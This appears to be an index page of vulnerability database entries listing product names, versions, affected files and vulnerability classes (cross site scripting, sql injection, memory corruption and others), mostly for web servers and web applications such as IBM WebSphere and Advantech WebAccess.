[61222] KENT-WEB YY-BOARD 6.3 cross site scripting
[61141] Cisco Webex Advanced Recording Format Player up to 27.25.10 memory corruption
[61079] IBM Lotus Expeditor up to 6.2.2 Web Container privilege escalation
[61056] Cms-center Simple Web Content Management System 1.1 item_delete.php sql injection
[61032] IBM WebSphere Application Server up to 7.0.0.14 Administration Console cross site scripting
[61031] IBM WebSphere Application Server up to 7.0.0.14 weak authentication
[61030] IBM WebSphere Application Server up to 7.0.0.14 Administration Console cross site scripting
[60988] Dolphin-browser Dolphin Browser HD webView Class information disclosure
[60817] Netweblogic Login With Ajax up to 2.1.0 login-with-ajax.php cross site scripting
[60816] Schneider Electric Kerweb 3.0 kw.dll cross site scripting
[60657] IBM WebSphere Application Server up to 6.1.0.11 weak encryption
[60450] Iwork WebGlimpse up to 2.2.2 WebGL wgarcmin.cgi directory traversal
[60449] Iwork WebGlimpse up to 2.2.2 wgarcmin.cgi cross site scripting
[60448] Iwork WebGlimpse up to 2.2.2 Installation wgarcmin.cgi information disclosure
[60345] Cisco 2106 Wireless Lan Controller Management Interface denial of service
[60306] IBM WebSphere Application Server 7.2 cross site scripting
[60302] Advantech WebAccess 5.0/6.0 cross site request forgery
[60301] Advantech WebAccess 5.0/6.0 sql injection
[60300] Advantech WebAccess 5.0/6.0 sql injection
[60299] Advantech WebAccess 5.0/6.0 ActiveX Control bwocxrun.ocx memory corruption
[60298] Advantech WebAccess 5.0/6.0 Format String
[60297] Advantech WebAccess 5.0/6.0 memory corruption
[60296] Advantech WebAccess 5.0/6.0 GbScriptAddUp.asp weak authentication
[60295] Advantech WebAccess 5.0/6.0 uaddUpAdmin.asp weak authentication
[60294] Advantech WebAccess 5.0/6.0 opcImg.asp memory corruption
[60293] Advantech WebAccess 5.0/6.0 memory corruption
[60292] Advantech WebAccess 5.0/6.0 information disclosure
[60291] Advantech WebAccess 5.0/6.0 cross site request forgery
[60290] Advantech WebAccess 5.0/6.0 sql injection
[60289] Advantech WebAccess 5.0/6.0 cross site scripting
[60286] Advantech WebAccess 5.0/6.0 ActiveX Control memory corruption
[60285] Advantech WebAccess 5.0/6.0 privilege escalation
[60284] Advantech WebAccess 5.0/6.0 memory corruption
[60283] Advantech WebAccess 5.0/6.0 bwview.asp cross site scripting
[60282] Advantech WebAccess 5.0/6.0 bwerrdn.asp cross site scripting
[60281] Advantech WebAccess 5.0/6.0 sql injection
[60202] PHP-Nuke Web Links Module modules.php sql injection
[60193] Helmut Hummel Typo3 Webservice up to 0.3.5 WebService memory corruption
[60137] EPiServer CMS up to 6.1.379.0 Admin Interface cross site scripting
[60115] Sphinx-soft Mobile Web Server 3.1.2.47 cross site scripting
[60105] Siemens SIMATIC HMI panel miniweb.exe privilege escalation
[60104] Siemens SIMATIC HMI panel miniweb.exe directory traversal
[59980] Horde Groupware Webmail Edition up to 1.2.8 cross site scripting
[59936] IBM WebSphere Application Server up to 6.1.0.10 Web Services Security cross site scripting
[59935] IBM WebSphere Application Server up to 6.1.0.10 cross site scripting
[59902] Apache Struts up to 2.2.3 Interfaces privilege escalation
[59893] Red Hat JBoss Operations Network up to 2.2 Administration Interface cross site scripting
[59833] Yaws Web Server 1.88 cross site scripting
[59827] GoAhead WebServer denial of service
[59637] Monoxide0184 Oxide WebServer directory traversal
[59629] phpWebSite up to 0.10.2 cross site scripting
[59626] Red Hat FreeIPA up to 2.1.3 Management Interface cross site request forgery
[59529] IBM Ts3100 Tape Library User Interface weak authentication
[59362] GoAhead Webserver 2.1.8 cross site scripting
[59275] Wikiwebhelp Wiki Web Help 0.28 sql injection
[59262] phpMyAdmin up to 3.4.5.0 Setup Interface cross site scripting
[59251] IBM WebSphere Application Server up to 6.1.0.10 Administration Console cross site scripting
[59250] IBM WebSphere Application Server up to 6.1.0.10 privilege escalation
[59248] IBM WebSphere Application Server information disclosure
[59247] IBM WebSphere MQ up to 7.0.1.2 denial of service
[59240] IBM WebSphere ILOG Rule Team Server 7.1.1 cross site scripting
[59238] Cisco WebEx Recording Format Player up to 27.9 memory corruption
[59237] Cisco WebEx Recording Format Player up to 27.9 memory corruption
[59209] Webcreate Webforum 5.1 cross site scripting
[59208] IBM WebSphere ILOG Rule Team Server 7.1.1 cross site scripting
[59207] Webcreate Webforum 5.1 cross site scripting
[59206] Webcreate Webforum 5.1 cross site scripting
[59204] Webcreate Webforum 5.1 cross site scripting
[59139] Oracle Java System Application Server 8.1 Web Container unknown vulnerability
[59123] Oracle Siebel CRM 8.1.1 User Interface unknown vulnerability
[59121] Oracle Fusion Middleware 10.1.3.5.1 Web Services Manager unknown vulnerability
[59117] Oracle Siebel CRM 8.0.0 User Interface unknown vulnerability
[59085] Oracle Fusion Middleware 10.1.3.5 Web Services Manager unknown vulnerability
[58955] Com Weblinks on Joomla index.php sql injection
[58917] WebManager-Pro CMS WebManager-Pro up to 7.4.3 c.php privilege escalation
[58916] WebManager-Pro CMS WebManager-Pro up to 7.4.2 c.php sql injection
[58906] Novell GroupWise 8.0 WebAccess cross site scripting
[58852] webSPELL 4.2.1 asearch.php sql injection
[58765] Webminimalist Web Minimalist 200901 index.php cross site scripting
[58717] WEBinsta mailing list manager 1.3e Error Message information disclosure
[58715] K5n WebCalendar 1.2.3 Error Message information disclosure
[58711] TinyWebGallery 1.8.3 Error Message information disclosure
[58636] Escortwebsitedesign escort-agency-cms Error Message information disclosure
[58596] 111WebCalendar 1.2.3 Error Message information disclosure
[58575] IBM WebSphere Commerce up to 6.0.0.11 weak authentication
[58564] IBM Lotus Domino 8.5.2 WebAdmin Nnotes.dll NSFComputeEvaluateExt memory corruption
[58434] IBM WebSphere Application Server up to 6.1.0.10 Administration Console directory traversal
[58261] IBM WebSphere Service Registry/Repository up to 7.0.0.3 agentDetect.jsp cross site scripting
[58199] shttpd 1.42 Embedded Web Server mongoose.c _shttpd_put_dir memory corruption
[58136] Samba up to 3.2.12 Web Administration Tool chg_passwd cross site scripting
[58135] Samba up to 3.2.12 Web Administration Tool cross site request forgery
[57966] IBM WebSphere Application Server up to 6.1.0.10 privilege escalation
[57959] IBM WebSphere Application Server up to 6.1.0.11 Administrative Console cross site request forgery
[57955] IBM Tivoli Directory Server up to 6.2.0.1 Web Administration Tool information disclosure
[57954] IBM Tivoli Directory Server up to 6.2.0.1 Web Administration Tool weak authentication
[57950] IBM WebSphere Portal up to 7.0.0.0 cross site scripting
[57904] Symantec Web Gateway 4.5.1.44 forget.php sql injection
[57887] IBM WebSphere MQ up to 7.0.1.2 privilege escalation
[57691] Microsoft SQL Server 2008 Web Service information disclosure
[57582] Imperva SecureSphere Web Application Firewall 7.0 cross site scripting
[57557] Webmin up to 1.530 useradmin/user-lib.pl cross site scripting
[57531] IBM WebSphere Portal up to 7.0.0.0 denial of service
[57530] IBM WebSphere Portal up to 7.0.0.0 cross site scripting
[57343] IBM WebSphere Application Server up to 6.1.0.10 Encryption Algorithm weak encryption
[57262] Digium Asterisk up to C.1.5 Manager Interface manager.c privilege escalation
[57256] Digium Asterisk up to C.1.5 Interfaces denial of service
[57071] IBM WebSphere Application Server up to 6.0.1.11 privilege escalation
[56809] OTRS up to 2.3.4 webscript.pl privilege escalation
[56782] IBM Tivoli Netcool/OMNIbus up to 7.1.0.12 Web GUI sql injection
[56778] IBM WebSphere Application Server up to 6.1.0.36/7.0.0.14 denial of service
[56777] IBM WebSphere Application Server up to 6.1.0.36/7.0.0.14 privilege escalation
[56776] IBM WebSphere Application Server up to 6.1.0.34/7.0.0.14 privilege escalation
[56775] IBM WebSphere Application Server up to 6.1.0.34/7.0.0.14 denial of service
[56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
[56773] IBM WebSphere Application Server up to 6.1.0.10/7.0.0.14 com.ibm.ws.jsp.runtime.WASJSPStrBufferImpl denial of service
[56772] IBM WebSphere Application Server up to 6.1.0.10 Session Initiation Protocol denial of service
[56771] IBM WebSphere Application Server up to 6.1.0.10 denial of service
[56770] IBM WebSphere Application Server up to 6.1.0.10 denial of service
[56769] IBM WebSphere Application Server up to 6.1.0.10 getACRWorkElementPtr denial of service
[56768] IBM WebSphere Application Server up to 6.1.0.10 Administrative Console privilege escalation
[56767] IBM WebSphere Application Server up to 6.1.0.10 privilege escalation
[56765] IBM WebSphere Application Server up to 6.1.0.10 privilege escalation
[56764] IBM WebSphere Application Server up to 6.1.0.10 cross site scripting
[56618] Cisco TelePresence Multipoint Switch 1.6.x RMI Interface denial of service
[56611] Cisco TelePresence Manager up to 1.6.2 RMI Interface privilege escalation
[56547] Cgiirc CGI:IRC up to 0.5.8 Interfaces interfaces/nonjs.pm cross site scripting
[56492] IBM WebSphere Application Server 6.1.0.9 privilege escalation
[56373] SMC Networks Smcd3g-ccr Firmware up to 1.4.0.41 Web Management weak encryption
[56320] Cisco WebEx Meeting Center memory corruption
[56319] Cisco Webex Advanced Recording Format Player up to 26.48 memory corruption
[56318] Cisco Webex Advanced Recording Format Player up to 26.48 atas32.dll memory corruption
[56317] Cisco Webex Advanced Recording Format Player up to 26.48 memory corruption
[56316] Cisco Webex Advanced Recording Format Player up to 26.48 memory corruption
[56315] Cisco Webex Advanced Recording Format Player up to 26.48 atas32.dll memory corruption
[56273] Novell GroupWise up to 8.0.2 WebAccess directory traversal
[56194] AWBS Advanced Webhost Billing System 2.1.1 cart.php sql injection
[56144] Oracle Supply Chain Products Suite 9.3.1 Web Client unknown vulnerability
[56086] Symantec Web Gateway up to 4.5.0.326 Management Console login.php sql injection
[56048] HP OpenView Network Node Manager 7.53 ovwebsnmpsrv.exe stringToSeconds memory corruption
[56031] IBM WebSphere Application Server up to 6.1.0.10 Administrative Console privilege escalation
[56030] IBM WebSphere Application Server up to 6.1.0.10 cross site scripting
[56029] IBM WebSphere MQ up to 7.0.1.2 memory corruption
[55863] IBM Rational ClearQuest up to 7.1.1 Web Client privilege escalation
[55861] IBM Rational ClearQuest up to 7.1.1 Web Client information disclosure
[55829] IBM WebSphere Service Registry/Repository privilege escalation
[55649] Bsdperimeter pfSense 2.0 Interfaces pkg_edit.php cross site scripting
[55626] IBM WebSphere Commerce up to 7.0.0.0 information disclosure
[55442] IBM WebSphere MQ up to 7.0.1.2 denial of service
[55426] IBM WebSphere MQ up to 6.0.2.2 weak encryption
[55409] IBM WebSphere Application Server up to 7.0.0.11 Administrative Console cross site scripting
[55408] IBM WebSphere Portal 6.1.0.1 cross site scripting
[55398] IBM WebSphere Commerce cross site scripting
[55397] IBM WebSphere Commerce up to 6.0.0.6 JavaServer Pages sql injection
[55396] IBM WebSphere Application Server up to 7.0.0.11 Web Services Security privilege escalation
[55395] IBM WebSphere Application Server up to 6.1.0.10 Administrative Console cross site request forgery
[55394] IBM WebSphere Application Server up to 7.0.0.11 Administrative Console cross site scripting
[55393] IBM WebSphere Application Server up to 6.1.0.10 Administrative Console cross site scripting
[55327] Yaws Web Server 1.89 directory traversal
[55161] IBM WebSphere MQ up to 7.0.1.1 weak authentication
[54841] Salvo Tomaselli Weborf HTTP Server up to 0.12.2 instance.c modURL directory traversal
[54795] IBM WebSphere Application Server up to 6.1.0.2 Administrative Console denial of service
[54723] IBM Lotus Sametime up to 1.4 WebContainer unknown vulnerability
[54617] Microsoft Outlook Web Access up to 2007 cross site request forgery
[54576] IBM WebSphere Application Server up to 6.1.0.11 privilege escalation
[54491] Jrbcs Webform report 5.x-2.6 cross site scripting
[54486] Websitesrus Accessories Me PHP Affiliate Script 1.4 browse.php sql injection
[54485] Websitesrus Accessories Me PHP Affiliate Script 1.4 search.php cross site scripting
[54318] Microsoft .NET Framework 2.0 SP1/2.0 SP2/3.5/3.5 SP1/3.5.1 Interfaces privilege escalation
[54308] nessus Web Server plugin 1.2.4 feed information disclosure
[54304] IBM WebSphere Service Registry/Repository 6.3.0 cross site scripting
[54263] HP OpenView Network Node Manager 7.53 webappmon.exe memory corruption
[54213] nessus Web Server plugin 1.2.4 cross site scripting
[54147] HP OpenView Network Node Manager 7.53 webappmon.exe execvp_nc memory corruption
[54120] Websedit Sk Calendar sql injection
[54071] Oracle Sun Java System Web Proxy Server 4.0.13 Administration Server unknown vulnerability
[54061] Oracle WebLogic Server 10.3.2 unknown vulnerability
[53998] Internetdm WebDM CMS cont_form.php sql injection
[53976] Joomla CMS Weblinks index.php sql injection
[53855] Cisco ASA 5580 up to 8.1.1 WebVPN privilege escalation
[53838] Moodle up to 1.9.0 lib/weblib.php cross site scripting
[53798] Salvo Tomaselli Weborf HTTP Server up to 0.12.1 Connection Header privilege escalation
[53795] IBM WebSphere Application Server up to 6.1.0.10 Administration Console cross site scripting
[53794] IBM WebSphere Application Server up to 6.1.0.10 Administration Console cross site scripting
[53779] IBM WebSphere ILOG JRules 6.7 cross site scripting
[53729] Litespeedtech LiteSpeed Web Server information disclosure
[53724] IBM WebSphere Application Server up to 7.0.0.0 denial of service
[53723] IBM WebSphere Application Server up to 6.1.0.10 mod_ibm_ssl privilege escalation
[53722] IBM WebSphere Application Server up to 7.0.0.0 on z/OS information disclosure
[53721] IBM WebSphere Application Server up to 7.0.0.0 Administrative Console cross site scripting
[53720] IBM WebSphere Application Server up to 7.0.0.0 cross site scripting
[53719] IBM WebSphere Application Server up to 7.0.0.0 information disclosure
[53700] HP OpenView Network Node Manager 7.53 ovwebsnmpsrv.exe main memory corruption
[53616] Accoria Rock Web Server 1.4.7 authcfg.cgi Format String
[53615] Accoria Rock Web Server 1.4.7 weak encryption
[53614] Accoria Rock Web Server 1.4.7 loadstatic.cgi directory traversal
[53613] Accoria Rock Web Server 1.4.7 authcfg.cgi cross site request forgery
[53612] Accoria Rock Web Server 1.4.7 loadstatic.cgi cross site scripting
[53534] Salvo Tomaselli Weborf HTTP Server up to 0.12.0 Range Header privilege escalation
[53531] HP OpenView Network Node Manager 7.53 ovwebsnmpsrv.exe sprintf memory corruption
[53530] HP OpenView Network Node Manager 7.53 Error ovwebsnmpsrv.exe memory corruption
[53445] Nitropowered NITRO Web Gallery 1.4 index.php sql injection
[53396] Timo Gaik Webby Webserver 1.01 memory corruption
[53385] Microsoft Exchange Server 2007 Outlook Web Access cross site scripting
[53234] IBM WebSphere Application Server up to 6.1.0.10 privilege escalation
[53233] IBM WebSphere Application Server up to 6.1.0.10 privilege escalation
[53232] IBM WebSphere Application Server up to 6.1.0.10 denial of service
[53231] IBM WebSphere Application Server up to 6.1.0.10 Access Restriction privilege escalation
[53171] Phpscripte24 Web Social Network Freunde Community 2.0 user.php sql injection
[52996] Moodle up to 1.9.7 weblib.php fix_non_standard_entities cross site scripting
[52956] Red Hat JBoss Enterprise Application Platform Web Console 4.2.0.CP09 privilege escalation
[52949] IBM WebSphere MQ up to 7.0.0 denial of service
[52890] Sharing-file Easy File Sharing Web Server 4.8 directory traversal
[52789] Imperva SecureSphere Web Application Firewall up to 6.2.0.6442 unknown vulnerability
[52784] Oracle Collaboration Suite 10.1.2.4 User Interface unknown vulnerability
[52783] Oracle Weblogic Server Component 9.2 privilege escalation
[52668] IBM WebSphere Portal up to 6.1.0.1 unknown vulnerability
[52647] Joomlamo Com Weberpcustomer up to 1.2.0 weberpcustomer.php directory traversal
[52599] Kjetiltroan WebMaid CMS up to 0.2-6 cContactus.php directory traversal
[52598] Kjetiltroan WebMaid CMS up to 0.2-6 cContactus.php privilege escalation
[52539] IBM WebSphere Application Server up to 6.1.0.10 denial of service
[52537] IBM WebSphere Application Server up to 6.1.0.10 Administration Console cross site scripting
[52536] VMware ESX Server 2.0.0 WebAccess privilege escalation
[52535] VMware ESX Server 3.5 WebAccess cross site scripting
[52428] IBM WebSphere Application Server up to 7.0.0.0 Administrative Console unknown vulnerability
[52356] Comscripts Web Server Creator Web Portal 0.1 directory traversal
[52355] Comscripts Web Server Creator Web Portal 0.1 index.php privilege escalation
[52354] Comscripts Web Server Creator Web Portal 0.1 index.php cross site scripting
[52220] Joomlamo Com Cartweberp 1.56.75 index.php directory traversal
[52134] Resalecode PHP Shopping Cart Selling Website Script index.php sql injection
[52133] Resalecode PHP Shopping Cart Selling Website Script index.php cross site scripting
[52051] Novell GroupWise 7.0/7.01/7.03/8.0 WebAccess cross site scripting
[52040] IBM Lotus iNotes up to 229.260 Domino Web Access cross site request forgery
[52039] IBM Lotus iNotes up to 229.260 Domino Web Access cross site scripting
[52038] IBM Lotus iNotes up to 229.210 Domino Web Access memory corruption
[52037] IBM Lotus iNotes up to 229.260 Domino Web Access unknown vulnerability
[51994] IBM Lotus Workplace Web Content Management up to 6.1.0.0 IBM WebSphere Portal login.jsp unknown vulnerability
[51993] IBM Lotus Workplace Web Content Management up to 6.1.0.0 IBM WebSphere Portal login.jsp cross site scripting
[51987] Novell eDirectory 8.8.5 Web Service weak encryption
[51973] Sun One Web Server up to 6.0 denial of service
[51972] Sun One Web Server denial of service
[51968] IBM WebSphere Portal 6.0.1.5 cross site scripting
[51895] Accellion Secure File Transfer Appliance web_client_user_guide.html directory traversal
[51858] K5n WebCalendar 1.2.0 cross site request forgery
[51847] K5n WebCalendar 1.2.0 cross site request forgery
[51846] K5n WebCalendar 1.2.0 users.php cross site scripting
[51779] IBM WebSphere Application Server up to 7.0.0.1 SSL information disclosure
[51764] IBM WebSphere Commerce 7.0 Encryption weak encryption
[51761] Alentum Weblog Expert cross site scripting
[51755] Sun One Web Server 6.0 Numeric Error
[51754] Sun One Web Server up to 6.0 privilege escalation
[51753] Sun One Web Server up to 6.0 cross site scripting
[51737] IBM WebSphere Service Registry/Repository up to 6.3.0.0 Registry Configuration
[51675] Sun Java System Web Server 7.0 Admin Server denial of service
[51674] Sun Java System Web Server 7.0 Format String
[51673] Sun Java System Web Server 7.0 Authorization memory corruption
[51627] Zeus Zeus Web Server up to 4.x Admin Server cross site scripting
[51626] Zeus Zeus Web Server up to 3.3.4 weak encryption
[51625] Sun Java System Web Server 7.0 memory corruption
[51624] Sun Java System Web Server 7.0 privilege escalation
[51623] Zeus Zeus Web Server up to 4.x memory corruption
[51621] IBM Lotus Web Content Management up to 6.0.1.3 cross site scripting
[51541] Yaws Web Server 1.85 Terminal privilege escalation
[51482] IBM Domino Web Access up to 229.240 unknown vulnerability
[51481] IBM Lotus iNotes up to 229.200 Domino Web Access unknown vulnerability
[51479] IBM Lotus iNotes up to 229.20 Domino Web Access unknown vulnerability
[51477] Sun Java System Web Server 7.0 memory corruption
[51476] Sun Java System Web Server 7.0 memory corruption
[51431] Webmin up to 1.2.39 cross site scripting
[51394] InterVations NaviCOPA Web Server up to 2.01 index.html%20 information disclosure
[51348] Intellicom Netbiter Webscada Ws200 Network Configuration privilege escalation
[51342] Provider4u Vsftpd Webmin module up to 1.x unknown vulnerability
[51319] Active Web Softwares Active Auction House 3.6 wishlist.asp sql injection
[51223] Horde Application Framework up to 3.0.7 Administration Interface phpshell.php cross site scripting
[51214] Cisco WebEx 26.00/27.00 WRF Player atrpui.dll memory corruption
[51213] Cisco WebEx 26.00/27.00 WRF Player atas32.dll memory corruption
[51212] Cisco WebEx 26.00/27.00 WRF Player atas32.dll memory corruption
[51211] Cisco WebEx 26.00/27.00 WRF Player ataudio.dll memory corruption
[51210] Cisco WebEx 26.00/27.00 WRF Player atas32.dll memory corruption
[51209] Cisco WebEx 26.00/27.00 WRF Player atas32.dll memory corruption
[51164] IBM DB2 8.2/9.1/9.5/9.7 Interfaces privilege escalation
[51111] HP OpenView Network Node Manager 7.53 ovwebsnmpsrv.exe memory corruption
[51108] HP OpenView Network Node Manager 7.53 OvWebHelp.exe memory corruption
[51107] HP OpenView Network Node Manager 7.53 webappmon.exe memory corruption
[51080] IBM InfoSphere Information Server up to 8.0 Web Console cross site scripting
[51052] IBM WebSphere Application Server up to 7.0.0.6 weak encryption
[51050] Gianni Tommasi Kr-php Web Content Server up to 1.1 adm/krgourl.php privilege escalation
[50982] IBM WebSphere Portal up to 6.1.0.1 unknown vulnerability
[50981] IBM WebSphere Portal up to 6.1.0.1 cross site scripting
[50816] IBM WebSphere Application Server up to 6.1.0.10 Administrative Console cross site request forgery
[50718] Sun Java System Web Server 7.0 memory corruption
[50627] Fijiwebdesign Com Ajaxchat 1.0 privilege escalation
[50547] Citrix XenCenterWeb privilege escalation
[50546] Citrix XenCenterWeb cross site request forgery
[50545] Citrix XenCenterWeb login.php sql injection
[50544] Citrix XenCenterWeb cross site scripting
[50477] Davethewebguy Battle Blog 1.25 comment.asp cross site scripting
[50476] Davethewebguy Battle Blog 1.25 admin/authenticate.asp sql injection
[50392] InterVations NaviCOPA Web Server 3.01 information disclosure
[50190] McAfee Email/Web Security Appliance up to 5.1 unknown vulnerability
[50185] HP Storageworks Msl4048 Tape Library up to 6.50 Management Interface denial of service
[50132] IBM WebSphere Application Server up to 6.1.0.10 denial of service
[50130] IBM WebSphere Application Server up to 6.1.0.2 cross site scripting
[50119] IBM WebSphere Business Events 6.1 memory corruption
[50085] Linuxwebshop php User Base 1.3 directory traversal
[50047] Mozilla Bugzilla up to 3.4.1 WebService Bug.create sql injection
[50046] Mozilla Bugzilla 3.3.2/3.3.3/3.3.4/3.4.1/3.5 WebService sql injection
[49932] IBM WebSphere MQ 7.0.1.0 denial of service
[49931] IBM WebSphere MQ up to 6.0.2.3 unknown vulnerability
[49930] IBM WebSphere MQ 7.0.0.0 rriDecompress denial of service
[49871] IBM WebSphere Application Server up to 6.0.1 Access Restriction privilege escalation
[49870] IBM Domino Web Access up to 8.0.0 cross site scripting
[49622] IBM WebSphere Commerce Suite Configuration File Net.Commerce information disclosure
[49461] WebDynamite ProjectButler 1.5.0 pda_projects.php privilege escalation
[49425] IBM WebSphere Partner Gateway Console sql injection
[49424] IBM WebSphere Application Server up to 7.0.0.0 Access Restriction privilege escalation
[49423] IBM WebSphere Application Server up to 7.0.0.0 privilege escalation
[49422] IBM WebSphere Application Server up to 7.0.0.0 Access Restriction denial of service
[49421] IBM WebSphere Application Server up to 6.1.0.10 Configuration
[49420] IBM WebSphere Application Server up to 6.1.0.10 weak authentication
[49417] IBM WebSphere Application Server up to 6.1.0.10 Access Restriction weak authentication
[49415] IBM WebSphere Application Server up to 1.0.0.1 Access Restriction weak authentication
[49414] IBM WebSphere Commerce up to 6.0.0.3 unknown vulnerability
[49395] Microsoft Office 2000/2003/XP Office Web Components memory corruption
[49390] Microsoft Office 2000/2003/XP Office Web Components memory corruption
[49389] Microsoft Office 2000/2003/XP Office Web Components denial of service
[49375] Webhost-panel Bankoi WebHosting Control Panel 1.20 login.asp sql injection
[49157] Akiva Webboard 2.90 view.php directory traversal
[49144] Resalecode Hutscripts PHP Website Script showcategory.php sql injection
[49143] Resalecode Hutscripts PHP Website Script feedback.php cross site scripting
[49079] Sony Playstation 3 Web Browser denial of service
[48980] Sun Java System Web Server up to 6.1 jsp::$DATA information disclosure
[48970] IBM Lotus Instant Messaging/Web Conferencing 6.5.1 Error Message privilege escalation
[48944] Fijiwebdesign Com Php index.php sql injection
[48853] IBM WebSphere Application Server up to 6.1.0.11 Access Restriction privilege escalation
[48837] phion airlock Web Application Firewall 4.1-10.41 denial of service
[48835] HP OpenView Network Node Manager 7.53 webappmon.exe memory corruption
[48815] Sun Java Web Console up to 3.0.5 cross site scripting
[48776] AWScripts Gallery Search Engine 1.5 Admin Interface AWScripts.com weak authentication
[48741] Cisco Video Surveillance 2500 Series IP Camera Embedded Web Server information disclosure
[48735] IBM WebSphere Application Server up to 6.1.0.10 Access Restriction information disclosure
[48629] Creative Web Solutions Multi-Level CMS 1.21 insidepage.php sql injection
[48436] Sun Java System Web Server up to 6.0 Proxy Plug-In cross site scripting
[48424] webSPELL up to 4.2.0e src/func/language.php directory traversal
[48423] TinyWebGallery up to 1.5.3 08.10.2006 1000 directory traversal
[48405] IBM WebSphere Application Server up to 6.0.1 cross site scripting
[48404] IBM WebSphere Application Server up to 6.0.1 Administrative Console information disclosure
[48403] IBM WebSphere Application Server up to 6.0.1 information disclosure
[48402] IBM WebSphere Application Server up to 6.0.1 Administrative Console information disclosure
[48401] IBM WebSphere Application Server up to 6.1.0.11 IBM WebSphere Portal privilege escalation
[48400] IBM WebSphere MQ up to 6.0.2.2 memory corruption
[48384] Sun iPlanet Web Server up to 6.0 Default Configuration
[48260] Armorlogic Profense Web Application Firewall up to 2.2.20 privilege escalation
[48259] IBM WebSphere Partner Gateway up to 6.1.0 information disclosure
[48257] Armorlogic Profense Web Application Firewall up to 2.2.20 privilege escalation
[48256] Armorlogic Profense Web Application Firewall up to 2.2.20 cross site scripting
[48058] IceWarp eMail Server up to 7.4.1 webmail.php sql injection
[47928] WebPortal CMS 0.8 Beta indexk.php privilege escalation
[47905] webSPELL 4.2.0c cross site scripting
[47601] Alikonweb Com Bookjoomlas 0.1 sub_commententry.php sql injection
[47555] WEBBDOMAIN Polls 1.0/1.01 getin.php sql injection
[47500] uTorrent Web GUI 0.315 Administrator Account /gui/index.php cross site request forgery
[47486] Check Point Firewall-1 PKI Web Service Authorization memory corruption
[47482] Fullrevolution aspWebCalendar privilege escalation
[47418] IBM WebSphere Application Server up to 7.0.0.0 Web Services Security weak encryption
[47416] IBM WebSphere Application Server up to 6.1.0.10 Web Services Security privilege escalation
[47415] IBM WebSphere Application Server up to 6.1.0.10 Administrative Console weak authentication
[47410] Puppet Master webutil 2.7 webutil.pl privilege escalation
[47409] Puppet Master webutil 2.3 webutil.pl privilege escalation
[47408] Puppet Master webutil 2.3/2.7 webutil.pl privilege escalation
[47396] Comscripts Web Server Creator Web Portal 0.1 createdb.php privilege escalation
[47391] DotNetNuke up to 4.8.1 Access Restriction web.config privilege escalation
[47275] IBM WebSphere Application Server 6.1.0.11 com.ibm.wsspi.wssecurity.core Stored weak authentication
[47156] IBM WebSphere Application Server 6.1.0.11 information disclosure
[47068] IBM WebSphere Application Server 6.1.0.3 cross site scripting
[47067] IBM WebSphere Application Server 6.1.0.3 cross site scripting
[46980] TYPO3 up to 4.2.5 User Interface cross site scripting
[46935] Yaws Web Server up to 1.79 denial of service
[46816] IBM WebSphere Process Server up to 6.1.1 Administrative Console Configuration
[46765] Appstate phpWebSite up to 0.9.3-4 links.php sql injection
[46739] Comdev Web Blogger up to 4.1 sql injection
[46722] ASPThai.Net Webboard 6.0 bview.asp sql injection
[46701] IBM WebSphere Partner Gateway up to 6.0.0.2 weak authentication
[46595] Trend Micro InterScan Web Security Suite up to 3.0 privilege escalation
[46594] Trend Micro InterScan Web Security Virtual Appliance 3.1 Windows Media Player information disclosure
[46581] IBM WebSphere Application Server up to 6.1.0.10 denial of service
[46463] IBM WebSphere Application Server privilege escalation
[46460] IBM WebSphere Application Server up to 6.1.0.10 Java Message Service denial of service
[46458] IBM WebSphere Application Server up to 6.1.0.10 denial of service
[46457] IBM WebSphere Application Server up to 6.1.0.10 Configuration
[46450] IBM WebSphere Application Server up to 6.0.1.11 privilege escalation
[46449] IBM WebSphere Application Server up to 5.0.2.7 privilege escalation
[46438] Armorlogic Profense Web Application Firewall 2.6.2 ajax.html cross site request forgery
[46437] Armorlogic Profense Web Application Firewall 2.6.2 proxy.html cross site scripting
[46405] Web Design Hero JoomlaDate 1.2 index.php sql injection
[46360] HP OpenView Network Node Manager 7.53 webappmon.exe privilege escalation
[46350] GoAhead WebServer up to 2.1.4 privilege escalation
[46349] GoAhead WebServer up to 2.1.5 websSafeUrl privilege escalation
[46348] GoAhead WebServer 2.0/2.1/2.1.1/2.1.2/2.1.3 sockGen.c socketInputBuffered unknown vulnerability
[46347] GoAhead WebServer 2.0/2.1 denial of service
[46346] GoAhead WebServer 2.0/2.1/2.1.1/2.1.2/2.1.3 webs.c privilege escalation
[46345] GoAhead WebServer 2.0/2.1/2.1.1/2.1.2/2.1.3 webs.c privilege escalation
[46344] GoAhead WebServer 2.0/2.1 Security weak authentication
[46298] Webmin/Usermin up to 1.680 Referer Checker cross site scripting
[46297] Webmin/Usermin up to 1.590 cross site scripting
[46296] Webmin/Usermin up to 1.590 PopUp cross site scripting
[46259] Novell GroupWise up to 8.0 WebAccess information disclosure
[46228] IBM WebSphere Application Server 6.0.1 information disclosure
[46225] Novell GroupWise up to 8.0 WebAccess cross site request forgery
[46171] DMXReady Blog Manager inc_webblogmanager.asp sql injection
[46170] DMXReady Blog Manager inc_webblogmanager.asp cross site scripting
[46082] PHP JOBWEBSITE PRO sql injection
[46081] PHP JOBWEBSITE PRO cross site scripting
[46047] PHPSTREET Webboard 1.0 privilege escalation
[46046] PHPSTREET Webboard 1.0 show.php sql injection
[45992] Cmsisweb CMS ISWEB 3.0 index.php sql injection
[45991] Cmsisweb CMS ISWEB 3.0 index.php cross site scripting
[45909] IBM WebSphere DataPower XML Security Gateway XS40 3.6.1.5 Firmware privilege escalation
[45589] IBM WebSphere Portal up to 6.0.0.0 BasicAuthTAI privilege escalation
[45541] Activewebsoftwares Active Photo Gallery 6.2 account.asp sql injection
[45532] Activewebsoftwares Active Time Billing 3.2 Account.asp sql injection
[45445] Sun Java Web Console up to 3.0.5 unknown vulnerability
[45444] Sun Java System Portal Server 7.1 Java Web Console privilege escalation
[45421] DrWeb Anti-virus 4.44.0.09170 privilege escalation
[45365] IBM WebSphere Application Server Web Services Security information disclosure
[45364] IBM WebSphere Application Server information disclosure
[45363] IBM WebSphere Application Server information disclosure
[45362] IBM WebSphere Application Server weak encryption
[45295] Bdigital Web Solutions WebStudio CMS index.php sql injection
[45248] Bdigital Web Solutions WebStudio eHotel index.php sql injection
[45162] Aj Square AJ Auction up to Web 2.0 classifide_ad.php sql injection
[45150] Com Xewebtv on Joomla index.php sql injection
[45052] Trend Micro ServerProtect 5.7/5.58 RPC Interface memory corruption
[45051] Trend Micro ServerProtect 5.7/5.58 RPC Interface weak authentication
[45016] Deeserver Panuwat PromoteWeb MySQL go.php sql injection
